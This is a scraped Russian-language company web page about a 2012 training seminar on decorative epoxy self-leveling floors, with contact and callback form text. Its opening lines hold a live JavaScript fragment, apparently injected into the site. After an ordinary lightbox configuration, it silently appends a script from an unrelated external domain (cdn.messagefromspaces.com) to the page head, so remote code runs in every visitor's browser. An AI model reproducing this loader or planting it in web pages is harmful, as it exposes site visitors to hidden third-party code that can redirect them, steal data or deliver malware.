, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); } var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Заказать услуги онлайн




Заполните форму ниже, чтоби оставить заявку на наши услуги или продукцию. Наши специалисты обязательно свяжутся с Вами в ближайшее время!

Поля, помеченные *,обязательны для заполнения


Имя

заказ  

телефон*

Перезвонить Вам?




Закажите БЕСПЛАТНЫЙ обратный звонок нашего специалиста, и он обязательно свяжется с Вами в ближайшее время

Поля, помеченные *, обязательны для заполнения

Ваше имя

Номер телефона*

(812) 372-67-66

Москва

(495) 638-52-50

Санкт-Петербург

(812) 372-67-66


Итоги семинара, проведенного 03.03.2012

03 марта по инициативе ПСК «Грифон» в Санкт-Петербурге прошел обучающий семинар, посвященный работе с декоративными наливными полами.

В весеннем семинаре приняли участие представители строительных организаций из крупнейших городов Казахстана: Алма-Аты и Астаны, а также руководитель производственно-строительной компании из г.Кингисепп, Ленинградской области.

На обучающем семинаре участники смогли оценить все возможности и понять принципы работы с наливными полами. Декоративные эффекты, созданные на образцах, раскрыли присутствующим свои секреты: «паутинка» в наливном полу, пигментация цветов, 3D полы, наливные полы с чипсами и блестками, фотоизображения и логотипы, смешивание цветов и создание криволинейностей – вот далеко не полный список всего, что было продемонстрировано будущим специалистам.

Ключевая часть обучающего семинара вновь была посвящена практической работе с эпоксидными наливными полами и методам создания декоративных эффектов. Участники приняли активное участие в мастер-классе, и образцы работ, созданных в процессе, вы можете посмотреть в разделе «Фотогалерея» на нашем сайте.

Все участники стали обладателями именных сертификатов, подтверждающих право на реализацию и продвижение декоративных наливных полов торговой марки ПСК «Грифон» в своих регионах.